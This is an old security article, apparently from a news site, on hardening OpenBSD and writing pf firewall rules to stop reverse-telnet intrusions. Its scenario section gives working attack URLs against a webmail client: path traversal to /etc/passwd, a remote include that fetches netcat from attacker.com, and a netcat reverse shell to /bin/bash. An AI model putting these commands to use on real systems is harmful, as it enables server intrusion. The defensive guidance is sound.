|
|
Advertise Contact SecurityWatch |
| Articles | Editorials | Reviews | News | InfoSec Directory | Releases | Submit PR |
|
VoIP Articles - New to VoIP? VoIP Articles will help you understand what's important in VoIP. 
|
Combating reverse telnet using OpenBSD Packet Filter (pf) Author: Dr.T Monday, 25 November 2002, 14:24 GMT This article is meant for those who are going to implement firewall using OpenBSD. The main purpose for this article is to protect servers (such as web, mail, dns and others) within a firewalled network. This article is based on my personal experiences and I could not guarantee it will suit all system that you have. Fell free to email me any comments, feedback or any other issues concerning this article. Co-operations from everybody are highly appreciated. Credits:- --------- Full credit to the software authors for their tools that were used in doing this research. Many thanks to the developers of OpenBSD for creating such a wonderful OS. Theory:- -------- If and only if you are familiar with reverse telnet, netcat, http-tunneling and sort, then this article is for you to read, to think and to act in order to minimize successful intrusion attempts. (I strongly believe there is no 100% technique that can be used to stop intrusion when you’re connected to the Internet. IT Security is a process, methodology and effort) Scenario -------- The following are some examples to illustrate on how reverse telnet session can be used against you if your perimeter defenses are not at the optimum level. In the example, I will describe how to get illegal access to a web server running DragonFly Webmail client. 1) User input validation on an older version of DragonFly Webmail client can be a good introductory start. On your web browser, typing certain strings and commands in the url box could give you access to the files in the server that is running DragonFly Webmail client. Executing commands like http://victim.com/index.php?langc=../../../../../../etc/passwd would result in displaying the password file in the server. Bad? The worst is yet to come. The attacker can simply implant or upload backdoor programs such as NetCat to get interactive shell in the server. What will the attacker do? Here's what.... He would need to run a web server and put a file that contains (let's say cmd.txt). To do reverse telnet using NetCat, the attacker need to upload NetCat to the victim server and he can do it by running two commands using web browser. http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=wget%20-O%20/tmp/nc%20http://attacker.com/nc http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=chmod%20755%20/tmp/nc Then the attacker will use NetCat on his web server to listen for incoming connection throught certain port, lets say port 25. #nc –vv –l –p 25 The next step is for the attacker to use NetCat in the victim server to connect back to the attacker's machine. To get interactive shell, the attacker could simply issue a command using a web browser for the victim server to connect to his box. http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=/tmp/nc%20-vv%20attacker.com%2025%20-e%20/bin/bash That's it. The attacker will get interactive shell for the victim's server and will have fun with it. This is one of the scenario that may happen to your server if your firewall configuration allow outbound connection to any IP in the internet. I would say that a good firewall should have a firm configuration and do not allow connections or access needlessly. A strict perimeter defense will minimize the chances of an attacker to do further damage to your network. Nowadays, firewall alone is not sufficient. Firewalls, IDSses and a good security team will be a good pack against the non-ending cyber threats. Solution:- ---------- To negate such attacks using reverse telnet techniques, you can take several measures. I would like to recommend using OpenBSD if you are looking for a robust OS that have high security features. Installing OpenBSD is very simple and straight forward. If you have any problems installing it or using it, many helps and FAQs can be found at http://www.openbsd.org/faq.html For a start, this is how to install an OpenBSD box. Preparing your OpenBSD box 1) partition / 25% (must be less than 8 G, if you have larger h/disk) swap double your memory /tmp 5% /usr 30% /var 40% (for logging purpose) 2) services Disable all services, except ssh for remote maintance, take at look at /etc/rc.conf and set INETD, SENDMAIL to NO and pf to YES 3) file system edit your /etc/fstab /dev/wd0a / ffs rw 1 1 /dev/wd0d /tmp ffs rw,nodev,nosuid,noexec 1 2 /dev/wd0e /usr ffs rw,nodev 1 2 /dev/wd0f /var ffs rw,nodev,nosuid,noexec 1 2 4) updates your OpenBSD sources get scr.tar.gz and srcsys.tar.gz for your OpenBSD version from ftp.openBSD.org and untar it into /usr/src tips:- I would use cvsup rather than cvs because of it’s speed, for more information on how to setup cvsup client please refer to www.openbsd.org/anoncvs.html. After finishing upgrading sources, then you have to update the binary for your box that can be done by #cd /usr/src && rm –rf /usr/obj && make obj && make build 5) recompile kernel for better performance add this to the last line of your /usr/src/sys/arch/i386/conf/GENERIC NMBCLUSTER = 10240 MAX_KMAP = 200 MAX_KMAPENT = 8000 NBUF= 16384 #cd /usr/src/sys/arch/i386/conf/ && config GENERIC && cd ../compile/GENERIC && make depend && make then move your new kernel mv /bsd /bsd.old #cp /usr/src/sys/arch/i386/compile/GENERIC/bsd / #chown root.wheel /bsd 6) editing firewall Rules Sample /etc/pf.conf for restricting access to all servers (please edit to suit your needs) ---cut here --- MAIL="" #IP Mail server DNSSERV="" #IP host that offered DNS service DNSCLI="" #IP DNS server for client HTTP="" #IP Web Servis HTTPS="" #IP SSL Enabled SPOOF="" #preventing IP spoofing withing ( in/out ) eg {10.0.0.0/8, 172.16.0.0/16} BLACKLIST="" #eg IP netcraft.net EXTIF="" #External interface firewall eg {fxp0} INTIF="" #Internal interface firewall eg {fxp1} TRUST="" #trusted client monitoring servis / remote management SSHSERV="" #SSHD enabled server format SSHD="{ip,ip,ip}" for remote monitoring services MONITOR="" #IP for monitoring #scrubing all packets scrub in all #default rules, DENY all, don't trust any user input #blocking inbound and outbound packets from external interface block in log all block out log on $EXTIF from any to any #pass inbound and outbound from local interface pass in quick on lo0 all pass out quick on lo0 all pass in quick on $INTIF all pass out quick on $INTIF all #pass outbound from TUSTED HOST(LAN?) and keep state pass out quick on $EXTIF inet proto {tcp,udp} from $TRUST to any keep state #we can't tolerate at any port scanning performed into this network #and ip spoofing block in quick on $EXTIF inet proto tcp from any to any flags FUP/FUP block in quick on $EXTIF inet proto {tcp,udp} from $SPOOF to block out quick on $EXTIF inet proto {tcp,udp} from any to $SPOOF #blocking all inbound packet from unwanted site (ie netcraft) block in log quick on $EXTIF inet proto {tcp,udp} from $BLACKLIST to any #allowing this host resolve hostname and dns request from specific dns server pass out on $EXTIF inet proto {tcp,udp} from any to $DNSCLI port = domain keep state # Allowing Web Services pass in log quick on $EXTIF inet proto {tcp,udp} from any to $HTTP port = http flags S/SA keep state pass in log quick on $EXTIF inet proto {tcp,udp} from any to $HTTPS port = https flags S/SA keep state #Allowing remote monitoring over secure channel (SSH) pass in log quick on $EXTIF inet proto {tcp,udp} from $MONITOR to $SSHSERV port = 22 flags S/SA keep state #allowing DNS servis pass in log quick on $EXTIF inet proto {tcp,udp} from any to $DNSSERV port = domain flags S/SA keep state pass out log quick on $EXTIF inet proto {tcp,udp} from $DNSSERV to any port = domain keep state #allowing receive email to mail relay and send email pass in log quick on $EXTIF inet proto {tcp,udp} from any to $MAIL port = smtp flags S/SA keep state pass out log quick on $EXTIF inet proto {tcp,udp} from $MAIL to any port = smtp keep state 7) locking file system and hardening process I used to lock my file system so that it’s can't be backdoored, to undo this process for upgrading system sources you must boot to single user ( at boot prompt type boot –s ) Script to lock file system ---cut here ---- #!/bin/sh LOCKING_FILE_SYSTEM={/bin,/sbin,/usr,/bsd,/etc} for d in $LOCKING_FILE_SYSTEM; do /usr/bin/chflags -R schg $d done echo "Finished locking sensitive filesystem" echo "to unlock this file system for performing system updates, reboot to single user and run off.sh" --- cut here ---- Script to unlock file system (make sure you have already remount / and mount the other partition) #mount –u / && mount /tmp && mount /usr && mount /usr --- cut here ---- #!/bin/sh #off.sh LOCKING_FILE_SYSTEM={/bin,/sbin,/usr,/bsd,/etc} for d in $LOCKING_FILE_SYSTEM; do /usr/bin/chflags -R noschg $d done echo "Finished unlocking sensitive filesystem" echo "press CTRL+d to boot your box" Conclusion:- More and more application that you choose to run, the more you put your network into danger regards, wanvadder flyguy Greetings:- SCAN Clan (tynon,sk,pokleyzz,wyse,semit,sponfork,flyguy,s0cket370), kopisusu, eLcc, OOK and #mylinux on dalnet By: and http://www.scan-associates.net |
Saturday, August 27, 2005 Network Security
GFI MailArchiver for Exchange - Easily archive Exchange Server mail & comply with Sarbanes Oxley - Free evaluation available. Network Security Software - Sponsored by GFI Network Security. Check your website security with Acunetix Web Vulnerability Scanner. Audit your web applications for SQL injection, cross site scripting & more. Download trial! Wireless Security
Press Releases
|
| Copyright © 2000 - 2005 eBCVG IT Security | Affiliates :: RSS feeds :: Privacy |